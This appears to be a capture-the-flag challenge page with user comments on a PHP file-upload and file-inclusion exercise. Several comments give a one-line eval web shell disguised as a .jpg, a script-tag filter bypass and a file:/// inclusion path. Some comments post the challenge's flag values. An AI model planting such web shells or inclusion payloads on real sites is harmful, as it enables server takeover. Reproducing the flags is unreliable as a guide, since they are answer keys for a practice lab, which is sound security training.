评分(6)
解题动态
michelle123 攻破了该题 14小时前
lemox 攻破了该题 20小时前
jvfnvd.vl 攻破了该题 21小时前
精灵925 攻破了该题 1天前
小爱莉希雅 攻破了该题 1天前
fl4y 攻破了该题 1天前
Cera 攻破了该题 1天前
青春小豆 攻破了该题 2天前
努力学习的白 攻破了该题 3天前
niubill 攻破了该题 4天前
whshkdh 攻破了该题 4天前
追风的牛牛 攻破了该题 4天前
hsf996 攻破了该题 5天前
C071 攻破了该题 5天前
ikun0073 攻破了该题 5天前
The_sloth 攻破了该题 6天前
dsdqh699 攻破了该题 6天前
ggsea 攻破了该题 7天前
liyimanfan 攻破了该题 7天前
评论
qiusheng 2年前
举报
1、找到文件包含的路径XXXindex.php?file=upload.php;上传一句话木马(格式保存为jpg)<script language="php">@eval($_POST[cmd])</script> 2、上传完成后访问上传的路径看是否成功。XXX/index.php?file=upload/xxx.jpg 3、用蚁剑连接,url是XX
xiaoxiao972521 2年前
举报
虽然index.php?file=/flag 就出来了,但是依旧执着的绕过了upload.php
冯飞99 2年前
举报
绕来绕去看到你的评论一把过
zzccbb2005 2年前
举报
http://114.67.175.224:10017/index.php?file=file:///flag flag{27d76583b9a54c6ef8af91f66855ac12}
109张某 2年前
举报
这个题一句话传好像有些问题,我传了一堆,就只有下面仁兄的file:///flag方法成功了
asd+1024 2年前
举报
传木马的话,用<script language='php'>@eval($_POST['asd']);</script>然后,文件格式.jpg,在文件包含就可以了,file:///flag确实简单
不会编程的崽 2年前
举报
<?php>被过滤了,用这个<script language="php">@eval($_POST['attack'])</script>绕过,然后文件包含即可
2728462336 3年前
举报
文件上传+文件包含
wxy1343 3年前
举报
flag{9be4acf19dc430e5ba2973dbb72f371d}
⎝ZJJARY 3年前
举报
真的无语了 连上马找不到flag 删flag的人马亖了
dtm 3年前
举报
使用file协议读取文件内容,index.php?file=file:///flag得到flag
baianquanzu 3年前
举报
@Striker123456 因为原本的协议是file://但是flag这个文件前面需要一个/
Striker123456 3年前
举报
为什么是三个斜杠呢
wecld 3年前
举报
别卷了康康